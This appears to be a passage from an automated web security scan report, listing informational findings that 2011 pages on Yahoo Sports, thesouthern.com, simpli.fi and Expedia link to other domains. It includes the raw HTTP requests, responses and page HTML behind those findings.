<img src="http://d.yimg.com/a/p/sp/getty/9f/fullj.f3465156c4a1d8a9bd40907a552f9ac1/f3465156c4a1d8a9bd40907a552f9ac1-getty-114832789mw134_dallas_maver.jpg?x=198&y=136&xc=11&yc=1&wc=640&hc=440&q=100&sig=4Wg8UWZyVI3MM3XRtxqJOA--" title="Still no crown for LeBron" alt="Still no crown for LeBron" class="thumb-img" width="198" height="136">
<span class="text-bars">
...[SNIP]...
53/L=djY9_EwNdHHm3NorTdAdCwKBrcHW80317eUACLbV/B=QRxHyEwNPKI-/J=1307962853739702/K=bSqWFUWXYNJCrV4IxKTzqg/A=6418146/R=0/SIG=11j13n4o5/*http://football.fantasysports.yahoo.com/f1/signup" target="_blank"><img src="http://ads.yimg.com/a/a/ya/yahoo_sports8/yahoo!_fantasy_football11_smb_630x31.jpg" alt="click here" width="630" height="31" border="0"></a>
...[SNIP]...
<h4><a href="http://26594.r.msn.com/?ld=4vcIx65G7Wened1TPiUm8hji-vGFjTwBR8CI1QOF23IhkRJga6pjPpN_i5g92XS1IOMMRQEyG0ybJo6JF_iAU9WYJu2zEgIBP5C0fU1M3IfKRrbD4bt6KjagqmsySPhDKtLAcIwaBZeYHAp0rndfbn2PRmR8a0sy0lKiHF8q_FujGr4gFL50k3-_qU8dFTpycKKT1ebmbCxgO7huB90R1djggqeccn0LvhoziosLFpXjx2PwpPRb8BNBAM33BpaEpkxyPj7DEAk5Mqzx81LQ6j_apa6VRaGaYxH8EVYCDJMLk1VAlMs1yvIDlIYsRE96jQMfosaxAmY3M9yz8p-WfngshLSz0fm8FvO1m6MVWohIyaOQXnnttXicU">Oklahoma City Flowers</a>
...[SNIP]...
<p class="iysmcm-desc ysmcm-desc"><a href="http://26594.r.msn.com/?ld=4vcIx65G7Wened1TPiUm8hji-vGFjTwBR8CI1QOF23IhkRJga6pjPpN_i5g92XS1IOMMRQEyG0ybJo6JF_iAU9WYJu2zEgIBP5C0fU1M3IfKRrbD4bt6KjagqmsySPhDKtLAcIwaBZeYHAp0rndfbn2PRmR8a0sy0lKiHF8q_FujGr4gFL50k3-_qU8dFTpycKKT1ebmbCxgO7huB90R1djggqeccn0LvhoziosLFpXjx2PwpPRb8BNBAM33BpaEpkxyPj7DEAk5Mqzx81LQ6j_apa6VRaGaYxH8EVYCDJMLk1VAlMs1yvIDlIYsRE96jQMfosaxAmY3M9yz8p-WfngshLSz0fm8FvO1m6MVWohIyaOQXnnttXicU">Same Day Oklahoma City Flower Delivery. Family Owned and Operated!</a></p><a href="http://26594.r.msn.com/?ld=4vcIx65G7Wened1TPiUm8hji-vGFjTwBR8CI1QOF23IhkRJga6pjPpN_i5g92XS1IOMMRQEyG0ybJo6JF_iAU9WYJu2zEgIBP5C0fU1M3IfKRrbD4bt6KjagqmsySPhDKtLAcIwaBZeYHAp0rndfbn2PRmR8a0sy0lKiHF8q_FujGr4gFL50k3-_qU8dFTpycKKT1ebmbCxgO7huB90R1djggqeccn0LvhoziosLFpXjx2PwpPRb8BNBAM33BpaEpkxyPj7DEAk5Mqzx81LQ6j_apa6VRaGaYxH8EVYCDJMLk1VAlMs1yvIDlIYsRE96jQMfosaxAmY3M9yz8p-WfngshLSz0fm8FvO1m6MVWohIyaOQXnnttXicU" class="iysmcm-url ysmcm-url yltasis">www.FlowerShopping.com/OklahomaCity</a>
...[SNIP]...
<h4><a href="http://154875.r.msn.com/?ld=4vrRVPvf9AAf9cxUB01PAJXAiXtMQpAHSwNOdJEiRWUvkD9zc0K_qvshvT-FWpSr0-cl7DuTEfKDgYVVXR_9LztVyMj40yachGXvzRsAXTLrNEW4rWXrEhut0-rGS1Op2rT3NxrFx9o9nJ5fbbY7crJQIVuDHjZuLW5xHiBFtRKF8ksjP_40Qgi4SStT7LZGCprUWMee_c4G8Wcr2UWxJuHjmBZxg6F0_XfCd3Ng6llApoQFvbh4-n_RlZqLerOkp1dG5luFuuNmARoGiyZcEWUCia6CyCS8KCfHK_c-iBmPA1VAlMGIDKqiAyOvk-dTB7Ue6g6xAmY3M9pCiaG2bjFYqdLcdp3FoJYWZQA3rBsqoRFLAn6WWENAA">Cheap Flights From $39</a>
...[SNIP]...
<p class="iysmcm-desc ysmcm-desc"><a href="http://154875.r.msn.com/?ld=4vrRVPvf9AAf9cxUB01PAJXAiXtMQpAHSwNOdJEiRWUvkD9zc0K_qvshvT-FWpSr0-cl7DuTEfKDgYVVXR_9LztVyMj40yachGXvzRsAXTLrNEW4rWXrEhut0-rGS1Op2rT3NxrFx9o9nJ5fbbY7crJQIVuDHjZuLW5xHiBFtRKF8ksjP_40Qgi4SStT7LZGCprUWMee_c4G8Wcr2UWxJuHjmBZxg6F0_XfCd3Ng6llApoQFvbh4-n_RlZqLerOkp1dG5luFuuNmARoGiyZcEWUCia6CyCS8KCfHK_c-iBmPA1VAlMGIDKqiAyOvk-dTB7Ue6g6xAmY3M9pCiaG2bjFYqdLcdp3FoJYWZQA3rBsqoRFLAn6WWENAA">Don't Believe in Extra Discounts. Compare Cheap Flights From $39.</a></p><a href="http://154875.r.msn.com/?ld=4vrRVPvf9AAf9cxUB01PAJXAiXtMQpAHSwNOdJEiRWUvkD9zc0K_qvshvT-FWpSr0-cl7DuTEfKDgYVVXR_9LztVyMj40yachGXvzRsAXTLrNEW4rWXrEhut0-rGS1Op2rT3NxrFx9o9nJ5fbbY7crJQIVuDHjZuLW5xHiBFtRKF8ksjP_40Qgi4SStT7LZGCprUWMee_c4G8Wcr2UWxJuHjmBZxg6F0_XfCd3Ng6llApoQFvbh4-n_RlZqLerOkp1dG5luFuuNmARoGiyZcEWUCia6CyCS8KCfHK_c-iBmPA1VAlMGIDKqiAyOvk-dTB7Ue6g6xAmY3M9pCiaG2bjFYqdLcdp3FoJYWZQA3rBsqoRFLAn6WWENAA" class="iysmcm-url ysmcm-url yltasis">www.TripMama.com/Flights</a>
...[SNIP]...
<h4><a href="http://392327.r.msn.com/?ld=4v2CvxXrcid54ssO2V1VQNk9DKcqaziknhcNXgpuCsu5e6XFlObOF7nER8XgvR2tJKne_zBNB_KB_1L2hmYMJi9ZlKARKZM7gCuo9UBgdN97EJo73bO-_92yO9lSOZS2TqHWmKwng6ubvugAJ2uKSsTRq8KOcne2NE_0LBqnAeyAJCmfv24zvIcFz_NlW-Bb4ciT7RA0sSOX0K5iTuSCeGd_XG-TDHK5a_3GJqt-LS4rCMA4Ckhxkp4T7t_iADvgr-8IOAbfxQMH6hgzSZOpydVzVUCUyO4Wc6zRuzmG_zEjeKUM7TECZjcz0c9gai5630QsW0touxG2NfvFjkSW-baE5-yHAsYcw77A">NFL Merchandise</a>
...[SNIP]...
<p class="iysmcm-desc ysmcm-desc"><a href="http://392327.r.msn.com/?ld=4v2CvxXrcid54ssO2V1VQNk9DKcqaziknhcNXgpuCsu5e6XFlObOF7nER8XgvR2tJKne_zBNB_KB_1L2hmYMJi9ZlKARKZM7gCuo9UBgdN97EJo73bO-_92yO9lSOZS2TqHWmKwng6ubvugAJ2uKSsTRq8KOcne2NE_0LBqnAeyAJCmfv24zvIcFz_NlW-Bb4ciT7RA0sSOX0K5iTuSCeGd_XG-TDHK5a_3GJqt-LS4rCMA4Ckhxkp4T7t_iADvgr-8IOAbfxQMH6hgzSZOpydVzVUCUyO4Wc6zRuzmG_zEjeKUM7TECZjcz0c9gai5630QsW0touxG2NfvFjkSW-baE5-yHAsYcw77A">Shop for NFL Merchandise. 365 Day No Hassle Returns.</a></p><a href="http://392327.r.msn.com/?ld=4v2CvxXrcid54ssO2V1VQNk9DKcqaziknhcNXgpuCsu5e6XFlObOF7nER8XgvR2tJKne_zBNB_KB_1L2hmYMJi9ZlKARKZM7gCuo9UBgdN97EJo73bO-_92yO9lSOZS2TqHWmKwng6ubvugAJ2uKSsTRq8KOcne2NE_0LBqnAeyAJCmfv24zvIcFz_NlW-Bb4ciT7RA0sSOX0K5iTuSCeGd_XG-TDHK5a_3GJqt-LS4rCMA4Ckhxkp4T7t_iADvgr-8IOAbfxQMH6hgzSZOpydVzVUCUyO4Wc6zRuzmG_zEjeKUM7TECZjcz0c9gai5630QsW0touxG2NfvFjkSW-baE5-yHAsYcw77A" class="iysmcm-url ysmcm-url yltasis">www.FootballFanatics.com</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nba/news?slug=mc-spears_heat_failed_lebron_james_dwyane_wade_061311&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="LeBron hate continues">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307948894.jpg?x=94&y=63&xc=43&yc=1&wc=326&hc=219&q=100&sig=Xvl4l0f_TVE.F1uSsI4ZHw--" title="LeBron hate continues" alt="LeBron hate continues" width="94" height="63">
</a>
...[SNIP]...
m/soccer/blog/dirty-tackle/post/Why-goalkeepers-shouldn-8217-t-be-too-quick-to-?urn=sow-wp2377&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Goalie's costly celebration">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/08/goalie.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=TlV8qtCIHSkJYCX8s7qSeg--" title="Goalie's costly celebration" alt="Goalie's costly celebration" width="94" height="63">
</a>
...[SNIP]...
//sports.yahoo.com/nba/news?slug=dw-wetzel_cleveland_laughs_at_lebron_james_061211&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="LeBron's failure warms Cleveland hearts">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307947097.jpg?x=94&y=63&xc=1&yc=1&wc=180&hc=120&q=100&sig=Ec2FAhGBmbcGt5yb1E1q7A--" title="LeBron's failure warms Cleveland hearts" alt="LeBron's failure warms Cleveland hearts" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nba/news?slug=ap-nbafinals-markcuban&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Cuban humble after win">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
l_dont_lie/post/Video-Emotional-Dirk-Nowitzki-runs-into-the-loc?urn=nba-wp4846&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Why Dirk Nowitzki left the NBA Finals early">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/d2.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=kZLWzEBuB5OIti.wD3qccQ--" title="Why Dirk Nowitzki left the NBA Finals early" alt="Why Dirk Nowitzki left the NBA Finals early" width="94" height="63">
</a>
...[SNIP]...
all_dont_lie/post/Dallas-downs-the-Heat-takes-home-its-first-NBA-?urn=nba-wp4840&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Dallas wins NBA title in decisive fashion">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/mavs.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=u5SPXj_CUd8f7TwwUIjXZQ--" title="Dallas wins NBA title in decisive fashion" alt="Dallas wins NBA title in decisive fashion" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nba/news?slug=ap-nbafinals-heat&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Still no crown for LeBron">
<img src="http://d.yimg.com/a/p/sp/getty/9f/fullj.f3465156c4a1d8a9bd40907a552f9ac1/f3465156c4a1d8a9bd40907a552f9ac1-getty-114832789mw134_dallas_maver.jpg?x=94&y=63&xc=3&yc=1&wc=656&hc=440&q=100&sig=attJqgVCcbWX5fJecGk9.A--" title="Still no crown for LeBron" alt="Still no crown for LeBron" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nba/news?slug=ys-nba_finals_history_2011&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="NBA Finals winners, MVPs">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
s.yahoo.com/nba/blog/ball_dont_lie/post/Video-Mavs-and-Heat-tussle-a-bit-at-midcourt?urn=nba-wp4828&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Tussle mars first half">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/mavs.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=u5SPXj_CUd8f7TwwUIjXZQ--" title="Tussle mars first half" alt="Tussle mars first half" width="94" height="63">
</a>
...[SNIP]...
all_dont_lie/post/Odd-photo-starts-internet-uproar-over-LeBron-82?urn=nba-wp4819&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Photo of LeBron James creates stir on Web">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/lebron-big.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=uIeKaizVW.RdorgryBe0Sg--" title="Photo of LeBron James creates stir on Web" alt="Photo of LeBron James creates stir on Web" width="94" height="63">
</a>
...[SNIP]...
shutdown_corner/post/Tom-Brady-8217-s-mentor-given-one-month-to-live?urn=nfl-wp2566&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Sad health news for Tom Brady's mentor">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/brady.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=6Px4mV9VHyfgCJ68lZsJXA--" title="Sad health news for Tom Brady's mentor" alt="Sad health news for Tom Brady's mentor" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-dolphins-marshall&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="NFL star's wife in jail">
<img src="http://d.yimg.com/a/p/sp/getty/74/fullj.be3dd8e493d12661a6c3c69da6bd27b7/be3dd8e493d12661a6c3c69da6bd27b7-getty-_dolphin.jpg?x=94&y=63&xc=1&yc=1&wc=660&hc=442&q=100&sig=SLg3JcDSSPtWv01t0JhaVw--" title="NFL star's wife in jail" alt="NFL star's wife in jail" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-eagles-vick-graduation&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Vick surprises 2 grads with scholarships">
<img src="http://d.yimg.com/a/p/sp/ap/5e/fullj.261e7f944cfd25545b56930f1a2c06f3/ap-201106081242457246066.jpg?x=94&y=63&xc=1&yc=1&wc=349&hc=233&q=100&sig=DQRWzZOA498_5jeJ8SOypQ--" title="Vick surprises 2 grads with scholarships" alt="Vick surprises 2 grads with scholarships" width="94" height="63">
</a>
...[SNIP]...
irty-tackle/post/Eric-Hassli-scores-the-MLS-goal-of-the-season-so?urn=sow-wp2446&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Is this the best soccer goal of the year?">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/goal.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=ljrQeiwcSj_mrmcVg4ATtg--" title="Is this the best soccer goal of the year?" alt="Is this the best soccer goal of the year?" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/sow/news?slug=ro-rogers_gold_cup_panama_defeats_usa_061111&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="U.S. team's ugly loss">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307858429.jpg?x=94&y=63&xc=1&yc=1&wc=200&hc=134&q=100&sig=XyvTu0c9VsrVHGCR3997bA--" title="U.S. team's ugly loss" alt="U.S. team's ugly loss" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/sow/news?slug=ap-mexico-playerssuspended&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Mexico's soccer scandal">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/golf_experts/post/Tiger-Woods-8217-caddie-on-Adam-Scott-8217-s-?urn=golf-wp2533&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="New gig for Tiger Woods's longtime caddie">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/tiger1.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=dIURv6ZGoyUZZmWzhyuzVg--" title="New gig for Tiger Woods's longtime caddie" alt="New gig for Tiger Woods's longtime caddie" width="94" height="63">
</a>
...[SNIP]...
.com/golf/blog/golf_experts/post/Monty-predicts-Europeans-are-about-to-dominate-t?urn=golf-wp2535&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Golfer's bold prediction">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nba/news?slug=jy-ludden_dirk_nowitzki_nba_finals_coughing_061111&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Dirk fires back at Mavs">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307855496.jpg?x=94&y=63&xc=1&yc=1&wc=180&hc=120&q=100&sig=fBEIDS2ocjb7Na3dci2q1w--" title="Dirk fires back at Mavs" alt="Dirk fires back at Mavs" width="94" height="63">
</a>
...[SNIP]...
tp://sports.yahoo.com/nba/news?slug=aw-wojnarowski_lebron_james_dwyane_wade_nba_finals_game6_061111&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="LeBron coughing it up?">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
http://sports.yahoo.com/mma/news?slug=ki-iole_ufc131_dos_santos_beats_carwin_061111&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Dos Santos dominates Carwin at UFC 131">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307852871.jpg?x=94&y=63&xc=1&yc=1&wc=220&hc=147&q=100&sig=pSs3IwCg5jz8cCv94n_7Qw--" title="Dos Santos dominates Carwin at UFC 131" alt="Dos Santos dominates Carwin at UFC 131" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mma/news?slug=ys-ufc131_shane_carwin_blog_060911&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Carwin's pre-fight blog">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307722364.gif?x=94&y=63&xc=1&yc=1&wc=220&hc=147&q=100&sig=WMd9OccAwMTzQnWUVZpv5g--" title="Carwin's pre-fight blog" alt="Carwin's pre-fight blog" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mma/news?slug=mmajunkie-Spike_TV_TUF_14&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="'TUF 14' to feature 32">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
s.yahoo.com/mma/blog/cagewriter/post/Stout-scores-possible-KO-of-Year-on-Edwards-at-U?urn=mma-wp3402&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Knockout of the year?">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/shutdown_corner/post/Former-Cowboys-linebacker-Godfrey-Myles-dies-at-?urn=nfl-wp2552&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Ex-Cowboys player Godfrey Myles dies">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/11/godfrey-ipad.jpg?x=94&y=63&xc=215&yc=1&wc=596&hc=400&q=100&sig=KiIps_4zc5vJdVb5T8ZL8g--" title="Ex-Cowboys player Godfrey Myles dies" alt="Ex-Cowboys player Godfrey Myles dies" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=pfw-20110609_lockout_limbo_redskins_report&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Redskins' QB questions">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307677853.jpg?x=94&y=63&xc=13&yc=1&wc=350&hc=235&q=100&sig=_7Ph44gxlCqLT7uQYXoBQg--" title="Redskins' QB questions" alt="Redskins' QB questions" width="94" height="63">
</a>
...[SNIP]...
<a href="http://rivals.yahoo.com/ncaaf/news?slug=rivals-1230071&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Who won '04 NCAA title?">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<div id="ad-579434" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"> <script type="text/javascript" src="http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702"> </script>
...[SNIP]...
<div id="ad-436894" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"> <script type="text/javascript" src="http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702"> </script>
...[SNIP]...
<a href="http://us.lrd.yahoo.com/_ylt=AmSBOZDJi1_b83sbwQdsGnfTjdIF/SIG=11h6afr8f/EXP=1309172453/**http%3A//www.mavsmoneyball.com/" ><img src="http://l.yimg.com/a/p/sp/editorial_image/af/afb7a05bacb4dc1f3b0ee9ea39f1efc2/nbadal.gif" alt="SB Nation" />Mavs Moneyball</a>
...[SNIP]...
<a href="http://us.lrd.yahoo.com/_ylt=AhiU6TnXGdlBQdWEdkk7WmLTjdIF/SIG=11n9f9h9o/EXP=1309172453/**http%3A//www.silverscreenandroll.com/" ><img src="http://l.yimg.com/a/p/sp/editorial_image/66/66ed4c090d435ded86878f05b9320df7/nbalal.jpg" alt="SB Nation" />Silver Screen and Roll</a>
...[SNIP]...
<a href="http://us.lrd.yahoo.com/_ylt=AhrhZzpfExye8OGFipTyZ.nTjdIF/SIG=11nie43lb/EXP=1309172453/**http%3A//www.peninsulaismightier.com/" ><img src="http://l.yimg.com/a/p/sp/editorial_image/d4/d4f4977a4af580e2188d0b9454605942/nbamia.jpg" alt="SB Nation" />Peninsula is Mightier</a>
...[SNIP]...
/blog/ball_dont_lie/post/Video-Emotional-Dirk-Nowitzki-runs-off-court-ri;_ylt=AmX2akW77R0QvvnE7cz5YQzTjdIF?urn=nba-wp4846" title="Video: Emotional Dirk Nowitzki runs off court right before Finals win"><img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307938675.jpg" class="thumb" /></a>
...[SNIP]...
<div class="thumb">
<img src="http://l.yimg.com/a/p/i/bcst/turnersports/18542/124828121.jpg" width="92px" height="69px" alt="Sunday's Top 5" />
    <a href="http://sports.yahoo.com/video/player/nba/25586922;_ylt=AtQ5bPhcFOJ9gNusHlFa_q_TjdIF" >
...[SNIP]...
<div class="thumb">
<img src="http://l.yimg.com/a/p/i/bcst/cbslocal/18565/124828263.jpg" width="92px" height="69px" alt="Mavs Fans Celebrate NBA Championship In Miami" />
    <a href="http://sports.yahoo.com/video/player/nba/25586963;_ylt=AgC_xkuebiDrnifhnDhCB6rTjdIF" >
...[SNIP]...
<div class="thumb">
<img src="http://l.yimg.com/a/p/i/bcst/turnersports/18542/124827592.jpg" width="92px" height="69px" alt="Dunk of the Night" />
    <a href="http://sports.yahoo.com/video/player/nba/25586790;_ylt=AuHNfLJeYcC4K55MmQ49fwDTjdIF" >
...[SNIP]...
<div id="ad-441055" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"> <script type="text/javascript" src="http://ads.nba.com/js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702"> </script>
...[SNIP]...
</a> <script type="text/javascript" src="http://amch.questionmarket.com/adsc/d692902/3/695561/randm.js"></script>
...[SNIP]...

<img src="http://ad.yieldmanager.com/pixel?id=94633&t=2" width="1" height="1" /><script language=javascript>
...[SNIP]...
</div>

<iframe src="http://data.nba.com/data/html/gdyn/gdyn_nba.html" width=1 height=2 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no style="display:block;height:0;"></iframe>
</div>
</div>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/video/dash-players/yep-player.r169686;js/video/dash-players/dash-players.r170778;js/video/dash-players/dash-players-init.r172129.js?m"></script>

<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/answers_badge_1.5.r143221;js/teamtracker.r143221.js?m"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(1285ed9c4(gid$djY9_EwNdHHm3NorTdAdCwKBrcHW80317eUACLbV,st$1307962853651207,v$1.0))&t=J-D"></noscript>
...[SNIP]...

18.208. http://thesouthern.com/content/tncms/live/global/resources/scripts/common.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thesouthern.com
Path:	/content/tncms/live/global/resources/scripts/common.js

Issue detail

The page was loaded from a URL containing a query string:

http://thesouthern.com/content/tncms/live/global/resources/scripts/common.js?

The response contains the following link to another domain:

http://my.southernville.com/editor/app/admin/tprofile.aspx?p=1

Request

GET /content/tncms/live/global/resources/scripts/common.js? HTTP/1.1
Host: thesouthern.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Content-Type: application/x-javascript
Date: Mon, 13 Jun 2011 10:58:48 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
ETag: "1728669261"
Last-Modified: Thu, 04 Nov 2010 16:54:11 GMT
Real-Hostname: thesouthern.com
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 21383

/*
   Lee Common JS
   Last Update: 11/4/2010
   Author: Ryan Davis <ryan.davis@lee.net>
*/

// cookie plugin
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fro
...[SNIP]...
</a> | <a href="http://my.southernville.com/editor/app/admin/tprofile.aspx?p=1" rel="external">Edit your account</a>
...[SNIP]...

18.209. http://um.simpli.fi/am_js.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://um.simpli.fi
Path:	/am_js.js

Issue detail

The page was loaded from a URL containing a query string:

http://um.simpli.fi/am_js.js?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=338&external_user_id=E3F32BD05A8DDF4D5646D79602A10F8B

Request

GET /am_js.js?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz403fjVqW10ZWiw+hAg==

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:21:38 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 157

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=338&external_user_id=E3F32BD05A8DDF4D5646D79602A10F8B"/>');

18.210. http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information

Issue detail

The page was loaded from a URL containing a query string:

http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=nausi164;u16=USD;u13=892034;u14=215.2;u11=40;u9=Millenium Hilton;u7=2|0;u6=1;u4=20110714|20110718;u1=Hotel;u2=178293;ord=1?
http://fls.doubleclick.net/activityi;src=2588797;type=nausc826;cat=nausi956;u1=Hotel;u4=20110714|20110718;u2=178293;u6=1;u7=2|0;u9=Millenium Hilton;u11=40;u13=892034;u14=215.2;u16=USD;ord=1?
http://investors.expediainc.com/phoenix.zhtml?c=190013&p=irol-irhome
http://maps.google.com/staticmap?client=gme-expedia&size=222x136&zoom=14&sensor=false&format=png8&markers=40.71167,-74.01048,red|
http://www.bloglines.com/
http://www.carrentals.com/
http://www.citysearch.com/
http://www.classicvacations.com/
http://www.evite.com/
http://www.expedia.at/
http://www.expedia.be/
http://www.expedia.ca/
http://www.expedia.de/
http://www.expedia.dk/
http://www.expedia.es/
http://www.expedia.fr/
http://www.expedia.ie/
http://www.expedia.it/
http://www.expedia.nl/
http://www.expedia.no/
http://www.expedia.se/
http://www.expediaaccess.com/US/Special_Prog.aspx
